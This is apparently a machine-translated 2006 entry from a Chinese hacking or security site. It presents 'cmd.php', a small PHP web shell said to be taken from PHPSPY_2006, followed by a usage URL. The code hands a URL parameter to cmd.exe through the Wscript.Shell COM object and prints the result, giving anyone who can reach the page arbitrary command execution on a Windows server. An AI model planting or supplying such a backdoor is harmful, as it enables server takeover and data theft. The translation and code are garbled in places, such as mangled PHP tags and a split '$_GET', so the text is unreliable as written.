under windows the use of Wscript. Shell to run the command cmd. php-vulnerability warning-the black bar safety net

2006-12-25T00:00:00
ID MYHACK58:62200613414
Type myhack58
Reporter 佚名
Modified 2006-12-25T00:00:00

Description

From PHPSPY_2006 pick out a small program: cmd.php <? php $phpwsh=new COM("Wscript. Shell") or die("Create Wscript. Shell Failed!"); $exec=$phpwsh->exec("cmd.exe /c ".$ _GET['cmd'].""); $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput;

?& gt; Usage:<http://127.0.0.1/cmd.php?cmd=ver>